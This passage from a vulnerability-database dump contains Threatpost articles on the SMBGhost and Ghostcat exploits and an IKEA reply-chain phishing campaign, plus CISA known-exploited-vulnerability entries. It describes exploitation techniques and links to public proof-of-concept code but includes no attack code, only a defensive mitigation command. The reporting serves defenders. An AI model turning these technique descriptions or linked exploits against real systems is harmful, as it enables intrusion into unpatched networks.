"https://threatpost.com/wormable-unpatched-microsoft-bug/153632/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:14", "description": "The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.\n\nMicrosoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol \u2013 the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017. SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.\n\nIn this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\n\u201cAlthough Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,\u201d [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. \u201cCISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n\nThe author behind the PoC, who goes by \u201cChompie,\u201d announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.\n\n> This was a pain \ud83d\ude02. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>). [pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)\n> \n> \u2014 chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)\n\nThe PoC is notable because it achieves RCE \u2013 previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.\n\n\u201cWhile there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,\u201d said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie\u2019s exploit. \u201cThis is probably because remote kernel exploitation is very different from local exploitation in that an attacker can\u2019t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.\u201d\n\nWindows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.\n\n\u201cIn the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,\u201d the researchers explained. \u201cIn a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from \u2018physical\u2019 memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.\u201d\n\nTo protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can\u2019t patch. For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force. No reboot is necessary.\n\nTo protect unpatched SMB clients, Microsoft [noted that it\u2019s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).\n", "cvss3": {}, "published": "2020-06-08T15:54:41", "type": "threatpost", "title": "SMBGhost RCE Exploit Threatens Corporate Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-06-08T15:54:41", "id": "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "href": "https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-23T21:04:36", "description": "A vulnerability in the popular Apache Tomcat web server is ripe for active attack, thanks to a proof-of-concept (PoC) exploit making an appearance on GitHub. The now-patched bug affects Tomcat versions 7.0, 8.5 and 9.0.\n\nAccording to Flashpoint analysts Cheng Lu and Steven Ouellette, an exploit for the \u201cGhostcat,\u201d security bug (tracked as [CVE-2020-1938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938>) and first publicly disclosed Feb. 20) reliably allows information disclosure via file retrieval on a vulnerable server \u2013 without authentication or a user being tricked into a compromising interaction. And, in some situations, it could allow remote code execution, they said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cDue to the nature of the vulnerability, [the exploit] can be leveraged without any user interactions and with high reliability, with low chance of causing the vulnerable server to crash,\u201d explained the researchers, [in a posting](<https://www.flashpoint-intel.com/blog/ghostcat/>) on Friday. The duo said they\u2019ve confirmed that the PoC works.\n\n**The Bug**\n\nThe Apache Tomcat open-source web server supports various JavaScript-based technologies, including the Apache JServ Protocol (AJP) interface, which is where the vulnerability resides.\n\nThe AJP binary protocol \u2013 in essence a connector \u2013 allows the Tomcat servlet container, which is called Catalina, to communicate out to web applications to support extended functionalities for websites.\n\n\u201cThe AJP connector handles inbound requests [from applications] and passes to Catalina,\u201d wrote Lu and Ouellette. \u201cCatalina then passes the request to the proper web application and receives the dynamically generated content. This content is then sent back over the network by the AJP connector as the response to the request.\u201d\n\nThis connector is \u201chighly trusted\u2026and should not be exposed over an untrusted network, as it may be leveraged to gain complete access to the application server,\u201d the researchers warned, adding that it \u201cis expected to be exposed only internally.\u201d\n\nHowever, in a default Tomcat installation on Windows 10, Tomcat\u2019s AJP port, on 8009, is exposed \u2013 allowing outside users to interact with and gain access to the Tomcat server itself. The PoC exploit demonstrates how this state of affairs can be used to expose files.\n\nThe PoC code, written in Python, is capable of creating and sending an AJP request to a specified IP address, with a valid file path and name that the attacker would like to receive. A vulnerable server will return the file as a stream back to the PoC code, displaying it on the attacker\u2019s screen. Where the requested file is not a plain text file, the output stream can be saved and opened with an appropriate application.\n\n\u201cThrough the AJP connector, an attacker can retrieve arbitrary files from Tomcat\u2019s web root, including the files residing within the \u2018WEB-INF\u2019 and \u2018META-INF\u2019 directories through the ServletContext.getResourceAsStream() function,\u201d according to the Flashpoint posting. \u201cAdditionally, arbitrary files within the web application on the vulnerable Tomcat server can be processed as a JSP page through the AJP connector.\u201d\n\n**Remote Code Execution**\n\nThe bug does open the door to RCE, according to the researchers. If a vulnerable Tomcat server also allows file uploads (not the default setting, by the way), an attacker could upload their own code via the AJP connector.\n\nHowever, there\u2019s a big catch. To accomplish RCE, an attacker would need to find a web application that accepts file uploads that is running on a vulnerable Tomcat server. Attackers can\u2019t themselves simply change the server settings to allow file uploads.\n\n\u201cThe file-upload requirement can only be implemented by the web application developer, rather than the attacker,\u201d according to the analysis. \u201cFor this reason, only a portion of the vulnerable Tomcat servers may suffer the code-execution impact from this vulnerability.\u201d\n\nFurther, the publicly available PoC code doesn\u2019t support execution of files on a vulnerable server even with the prerequisites in place. \u201cHowever, such capability can be implemented on the basis of the PoC code with relative ease,\u201d the researchers warned.\n\n**Mitigation**\n\nWeb admins should update their Apache Tomcat instances to version 8.5.51 to avoid becoming victims; or, if they don\u2019t make use of AJP connectors, they can simply disable them. Lu and Ouelette noted. \u201cUsers can also consider exposing the connector only in the trusted network segment, rather than exposing it to the entire network, to reduce attack surface,\u201d they added.\n\nOtherwise, the barrier to exploitation is very low\u2014so businesses should brace for attacks.\n\n\u201cPublicly available PoC and exploit code make the exploitation of this vulnerability more accessible to threat actors of all skill levels. The mass scan activities could identify internet-facing instances of Tomcat susceptible to attacks. Therefore, Flashpoint analysts assess with moderate confidence that this vulnerability may see active exploitation attempts in the coming days in a more targeted fashion.\u201d\n", "cvss3": {}, "published": "2020-03-23T20:56:37", "type": "threatpost", "title": "Apache Tomcat Exploit Poised to Pounce, Stealing Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-1938"], "modified": "2020-03-23T20:56:37", "id": "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "href": "https://threatpost.com/apache-tomcat-exploit-stealing-files/154055/?utm_source=rss&utm_medium=rss&utm_campaign=apache-tomcat-exploit-stealing-files", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", "type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-12-02T16:19:50", "description": "VMware vCenter Server and Cloud Foundation Server contain a SSRF vulnerability due to improper validation of URLs in a vCenter Server plugin. This allows for information disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-03-07T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server and Cloud Foundation Server Side Request Forgery (SSRF) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2022-03-07T00:00:00", "id": "CISA-KEV-CVE-2021-21973", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T16:19:50", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-34473", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:19:50", "description": "VMware vCenter Server vSphere Client contains a remote code execution vulnerability in a vCenter Server plugin which allows an attacker with network access to port 443 to execute commands with unrestricted privileges on the underlying operating system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21972", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:19:50", "description": "Microsoft Windows DNS Servers fail to properly handle requests, allowing an attacker to perform remote code execution in the context of the Local System Account. The vulnerability is also known under the moniker of SIGRed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1350", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T16:19:50", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft SMBv3 Remote Code Execution Vulnerability", 